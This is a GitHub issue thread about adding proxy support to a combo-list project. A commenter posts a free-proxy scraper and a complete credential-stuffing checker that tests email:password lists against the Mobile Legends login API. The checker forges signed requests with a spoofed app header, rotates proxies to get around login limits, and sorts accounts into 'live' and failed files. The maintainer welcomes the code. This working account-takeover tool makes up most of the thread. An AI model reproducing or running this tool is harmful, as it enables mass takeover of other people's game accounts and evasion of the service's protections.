### ISSUE TITLE
Add Proxy Support

### ISSUE THREAD

**Issue by voldemort1912** [VoldemortCommunity/ComboGen#2]
Proxy Support cannot be added due to Android Limitations, if anybody has Workarounds or Solutions, please reach out.

**Comment by lilcanopener1** [comment]
import requests, os, shutil
from bs4 import BeautifulSoup as bs
from concurrent.futures import ThreadPoolExecutor

try: shutil.rmtree(
    'get_proxy/__pycache__'
  )
except: pass

proxy_list = []
valid_proxy = []

def prox():
  print('''
[1] Ambil proxy dari situs (free-proxy-list.com)
[2] Ambil proxy dari situs (free-proxy-list.net)[\033[92mDisarankan\033[0m]
[3] Dari file
  ''')
  ask = int(
    input(
      '[?] Chose: '
    )
  )
  if ask == 1:
    return proxy_com(
    )
  elif ask == 2:
    return proxy_net(
    )
  elif ask == 3:
    return from_file(
    )
  else:
    exit(
      '\n[!] Goblokk ajg, elu butaa yaaa?'
    )

def proxy_checker(prox):
  try:
    global valid_proxy
    if requests.get(
       'http://ip.ml.youngjoygame.com:30220/myip',
          verify=False,
          proxies=prox,
          timeout=10
        ).status_code == 200:
      valid_proxy.append(
        prox
      )
    print(
      end='\r[+] Ditemukan (%s) proxy valid.'%(
        len(
          valid_proxy
        )
      ),
      flush=True
    )
  except: pass

def proxy_com():
  limit = int(
    input(
      '[?] Limit (ex: 100): '
    )
  )
  count = 1
  stop = False
  url = 'https://free-proxy-list.com?page=%s' %(
    str(
      count
    )
  )
  while 1:
    try:
      found = False
      r = requests.get(
        url,
        headers={'user-agent':'chrome'}
      ).text
      soup = bs(
        r,
        'html.parser'
      )
      for x in soup.find_all('a'):
        if x.has_attr(
          'alt'
        ) == True:
          proxy = (
            x['alt']
          )
          found = True
          proxy_list.append({
            'http':'http://'+proxy.strip(),
            'https':'https://'+proxy.strip()
          }) if len(
            proxy.strip().split(':')
          ) == 2 else None
          print(
            end='\r[+] Mengambil (%s) proxy.'%(
              len(proxy_list)
            ),
            flush=True
          )
          if len(
            proxy_list
          ) == limit or len(
            proxy_list
          ) > limit:
            stop = True
            break
      if found == False:
        print(
          '\n[!] Hanya bisa mengambil (%s) proxy' %(
            str(
              len(
                proxy_list
              )
            )
          )
        )
        break
      elif stop == False:
        count+=1
        url = 'https://free-proxy-list.com?page=%s' %(
          str(
            count
          )
        )
      else:
        break
    except: pass
  if len(
    proxy_list
  ) != 0:
    print(
      '\n[*] Mencari proxy valid'
    )
    with ThreadPoolExecutor(
      max_workers=50
      ) as thread:
      [
        thread.submit(
          proxy_checker,(
            prox
          )
        ) for prox in proxy_list
      ]
    if len(
      valid_proxy
    ) != 0:
      print(
        '\n'
      )
      return valid_proxy
    else: exit(
      '[!] Maaf tidak ada proxy yang valid silahkan coba lagi :('
    )
  else: exit(
    '[!] Maaf proxy tidak ada :('
  )

def proxy_net():
  print(
    '[*] Mencari proxy valid'
  )
  r = requests.get(
    'https://free-proxy-list.net/',
    headers={'user-agent':'chrome'}
  ).text
  soup = bs(
    r,
    'html.parser'
  )
  proxs = soup.find(
    'textarea'
  ).text.split(
    '\n'
  )
  [
    proxy_list.append({
      'http':'http://'+e.strip(),
      'https':'https://'+e.strip()
    }) if len(
      e.strip(
      ).split(
        ':'
      )
    ) == 2 else None for e in proxs
  ]
  if len(
    proxy_list
  ) != 0:
    with ThreadPoolExecutor(
      max_workers=50
      ) as thread:
      [
        thread.submit(
          proxy_checker,(
            prox
          )
        ) for prox in proxy_list
      ]
    if len(
      valid_proxy
    ) != 0:
      print(
        '\n'
      )
      return valid_proxy
    else: exit(
      '[!] Maaf tidak ada proxy yang valid silahkan coba lagi :('
    )
  else: exit(
    '[!] Maaf proxy tidak ada :('
  )

def from_file():
  print(
    '\n[!] Pemisah ip:port ex: 10.1.3:8080'
  )
  list = input(
    '[?] List proxy (ex: proxy.txt): '
  )
  if os.path.exists(
    list
  ):
    for data in open(
      list,
      'r',
      encoding='utf-8'
    ).readlines(
      ):
      prox = data.strip(
      ).split(
        ':'
      )
      try:
        if prox[0] and prox[1]:
          proxy_list.append({
            'http': 'http://'+data.strip(),
            'https': 'https://'+data.strip(),
          })
      except: pass
    if len(
      proxy_list
    ) != 0:
      print(
        '[*] Total (%s) proxy' %(
          str(
            len(
              proxy_list
            )
          )
        )
      )
      print(
        '[*] Mencari proxy valid'
      )
      with ThreadPoolExecutor(
        max_workers=50
      ) as thread:
        [
          thread.submit(
            proxy_checker,(
              prox
            )
          ) for prox in proxy_list
        ]
      if len(
        valid_proxy
      ) != 0:
        print(
          '\n'
        )
        return valid_proxy
      else: exit(
        '[!] Maaf tidak ada proxy yang valid silahkan coba lagi :('
      )
    else: exit(
      '[!] Maaf proxy tidak ada :('
    )
  else: exit(
    '[!] File tidak ditemukan "{0}"'.format(
      list
    )
Try this code idk how to add it to the python script tho good luck 😊

**Comment by voldemort1912** [comment]
Thank you very much, I'll try it out

**Comment by lilcanopener1** [comment]
Btw tell me if it works it should had it working in other programs

**Comment by lilcanopener1** [comment]
import os, sys, hashlib, json, random, re
from get_proxy import proxy

try:
  from concurrent.futures import ThreadPoolExecutor
except ImportError:
  os.system(
    'pip install futures'
  )
  exit(
    'Please restart this tools'
  )

try:
  from bs4 import BeautifulSoup as bs
except ImportError:
  os.system(
    'pip install bs4'
  )
  exit(
    'Please restart this tools'
  )

try:
  import requests
except ImportError:
  os.system(
    'pip install requests'
  )
  exit(
    'Please restart this tools'
  )

api = 'https://accountmtapi.mobilelegends.com/'

class MOONTON:
  def __init__(self, url):
    self.userdata = []
    self.live = []
    self.wrong_password = []
    self.wrong_email = []
    self.limit_login = []
    self.unknown = []
    self.proxy_list = []
    self.api = url
    self.loop = 0
    print('''\033[0m

|V| _  _ __ _|_ _ __    /  |_  _  _  |  _  __
| |(_)(_)| | |_(_)| |   \__| |(/_(_  |<(/_ |
---------------------------------------------
          - Created By (DulLah) -
---------------------------------------------\n''')
##########################################
# Please don't remove the author name :( #
##########################################

  def auto_upper(self, string):
    text = ''.join(
      re.findall(
        '[a-z-A-Z]',
        string
      )
    )
    if text.islower(
      ) == True:
      o = ''
      for i in range(
        len(
          string
        )
      ):
        if string[i].isnumeric(
          ) == False and string[
            i
          ].isalpha(
          ):
          return o + string[
            i
          ].upper(
          ) + string[
            i+1:
          ]
        else: o+=string[
          i
        ]
      return string
    else: return string

  def main(self):
    print(
      '[!] Pemisah email:password atau email|password\n'
    )
    empas = input(
      '[?] List empas (ex: list.txt): '
    )
    if os.path.exists(
      empas
    ):
      for data in open(
        empas,
        'r',
        encoding='utf-8'
      ).readlines():
        try:
          user = data.strip(
          ).split(
            '|'
          )
          if user[
           0
          ] and user[
            1
          ]:
            em = user[
              0
            ]
            pw = self.auto_upper(
              user[
                1
              ]
            )
            self.userdata.append({
              'email': em,
              'pw': pw,
              'userdata': '|'.join(
                [
                  em,
                  pw
                ]
              )
            })
        except IndexError:
          try:
            user = data.strip().split(
              ':'
            )
            if user[
              0
            ] and user[
              1
            ]:
              em = user[
                0
              ]
              pw = self.auto_upper(
                user[
                  1
                ]
              )
              self.userdata.append({
                'email': em,
                'pw': pw,
                'userdata': ':'.join(
                  [
                    em,
                    pw
                  ]
                )
             })
          except: pass
      if len(
        self.userdata
      ) == 0:
        exit(
          '[!] Empas tidak ada atau tidak valid pastikan berformat email:pass atau email|pass'
        )
      print(
        '[*] Total {0} account'.format(
          str(
            len(
              self.userdata
            )
          )
        )
      )
      ask = input(
        '[?] Apakah ingin menggunakan proxy?(\033[92mDisarankan\033[0m) [Y/t]: '
      )
      if ask.lower(
      ).strip(
      ) == 'y':
        self.valid_proxy = proxy.prox(
        )
        with ThreadPoolExecutor(
          max_workers=50
        ) as thread:
          [
            thread.submit(
              self.validate,
              user,
              True
            ) for user in self.userdata
          ]
      else:
        print(
          ''
        )
        with ThreadPoolExecutor(
          max_workers=10
        ) as thread:
          [
            thread.submit(
              self.validate,
              user,
              False
            ) for user in self.userdata
          ]
      print(
        '\n\n[#] LIVE: '+str(
          len(
            self.live
          )
        )+' - saved: live.txt'
      )
      if len(
        self.live
      ) != 0:
        print(
          '\n'.join(
            self.live
          )+'\n'
        )
      print(
        '[#] WRONG PASS: '+str(
          len(
            self.wrong_password
          )
        )+' - saved: wrongPwd.txt'
      )
      print(
        '[#] WRONG EMAIL: '+str(
          len(
            self.wrong_email
          )
        )+' - saved: wrongEmail.txt'
      )
      print(
        '[#] LIMIT LOGIN: '+str(
          len(
            self.limit_login
          )
        )+' - saved: limitLogin.txt'
      )
      print(
        '[#] UNKNOWN: '+str(
          len(
            self.unknown
          )
        )+' - saved: unknown.txt'
      )
      exit(
      )
    else: print(
      '[!] File tidak ditemukan "{0}"'.format(
        empas
      )
    )

  def hash_md5(self, string):
    md5 = hashlib.new(
      'md5'
    )
    md5.update(
      string.encode(
        'utf-8'
      )
    )
    return md5.hexdigest(
    )

  def build_params(self, user):
    md5pwd = self.hash_md5(
      user[
        'pw'
      ]
    )
    hashed = self.hash_md5(
      'account={0}&md5pwd={1}&op=login'.format(
        user[
          'email'
        ],
        md5pwd
      )
    )
    return json.dumps({
      'op': 'login',
      'sign': hashed,
      'params': {
        'account': user[
          'email'
        ],
        'md5pwd': md5pwd,
      },
      'lang': 'cn'
    })

  def validate(self, user, with_porxy):
    try:
      data = self.build_params(
        user
      )
      headers = {
        'host': 'accountmtapi.mobilelegends.com',
        'user-agent': 'Mozilla/5.0',
        'x-requested-with': 'com.mobile.legends' # Fake requests
      }
      if with_porxy == True:
        proxy = random.choice(
          self.valid_proxy
        )
        response = requests.post(
          self.api,
          data=data,
          headers=headers,
          proxies=proxy,
          timeout=10
        )
      else:
        response = requests.post(
          self.api,
          data=data,
          headers=headers
        )
      if response.status_code == 200:
        if response.json(
        )[
          'message'
         ] == 'Error_Success':
          print(
            '\r[\033[92mLIVE\033[0m] '+user[
              'userdata'
             ]+' -> (\033[92mSuccess login\033[0m)'
          )
          self.live.append(
            user[
              'userdata'
            ]
          )
          open(
            'live.txt',
            'a'
          ).write(
            str(
              user[
                'userdata'
              ]
            )+'\n'
          )
        elif response.json(
        )[
          'message'
         ] == 'Error_PasswdError':
          print(
            '\r[\033[91mDIEE\033[0m] '+user[
              'userdata'
            ]+' -> (\033[91mWrong password\033[0m)'
          )
          self.wrong_password.append(
            user[
              'userdata'
            ]
          )
          open(
            'wrongPwd.txt',
            'a'
          ).write(
            str(
              user[
                'userdata'
              ]
            )+'\n'
          )
        elif response.json(
        )[
          'message'
         ] == 'Error_PwdErrorTooMany':
          print(
            '\r[\033[91mDIEE\033[0m] '+user[
              'userdata'
            ]+' -> (\033[91mLimit login\033[0m)'
          )
          self.limit_login.append(
            user[
              'userdata'
            ]
          )
          open(
            'limitLogin.txt',
            'a'
          ).write(
            str(
              user[
                'userdata'
              ]
            )+'\n'
          )
        elif response.json(
        )[
          'message'
        ] == 'Error_NoAccount':
          print(
            '\r[\033[91mDIEE\033[0m] '+user[
              'userdata'
            ]+' -> (\033[91mWrong email\033[0m)'
          )
          self.wrong_email.append(
            user[
              'userdata'
            ]
          )
          open(
            'wrongEmail.txt',
            'a'
          ).write(
            str(
              user[
                'userdata'
              ]
            )+'\n'
          )
        else:
          print(
            '\r[\033[91mDIEE\033[0m] '+user[
              'userdata'
            ]+' -> (\033[91mUnknown\033[0m)'
          )
          self.unknown.append(
            user[
              'userdata'
            ]
          )
          open(
            'unknown.txt',
            'a'
          ).write(
            str(
              user[
                'userdata'
              ]
            )+'\n'
          )
        die = len(
          self.wrong_password
        ) + len(
          self.limit_login
        ) + len(
          self.wrong_email
        ) + len(
          self.unknown
        )
        self.loop+=1
        print(
          end='\r[*] Checked: %s/%s LIVE: %s - DIEE: %s '%(
            str(
              self.loop
            ),
            str(
              len(
                self.userdata
              )
            ),
            str(
              len(
                self.live
              )
            ),
            str(
              die
            )
          ),
          flush=True
        )
      else: self.validate(
        user,
        with_porxy
      )
    except: self.validate(
      user,
      with_porxy
    )

if __name__ == '__main__':
  try:
    (
      MOONTON(
        api
      ).main(
      )
    )
  except Exception as E:
    exit(
      '[!] Error: %s' %(
        E
      )
    )$
Program that uses the proxy works on Android just thought I would help u more! 
![Screenshot_20200725-000828.png](https://user-images.githubusercontent.com/68269911/88448360-0d38a680-ce0b-11ea-8bea-293fd660b891.png)

**Comment by voldemort1912** [comment]
Yes, I've been aware of it for a while now, I don't whether Python 3.8 fixed it or Android 9, but it works now and I posted this update on my Telegram Newsletter. I just haven't had time to pay attention on these projects lately. I will push out updates as soon as I can. Thank you for your support.

**Comment by lilcanopener1** [comment]
What is ur telegram channel

**Comment by voldemort1912** [comment]
https://t.me/VoldemortNewsletter/103

I've also referenced the particular post mentioned in the my previous comment. Thank you for your interest!

**Comment by lilcanopener1** [comment]
THX have a good day srry i been inactive for a while :)

**Comment by lilcanopener1** [comment]
![Screenshot_20200808-015841.png](https://user-images.githubusercontent.com/68269911/89703666-c4104880-d91a-11ea-9e92-252fba5bf16b.png)

This error right here happenes all the time if you find a fix it would help

**Comment by voldemort1912** [comment]
Termux updated the "termux-setup-storage" function recenty, and that is causing this error, I'll fix it in the next update. Shortly.
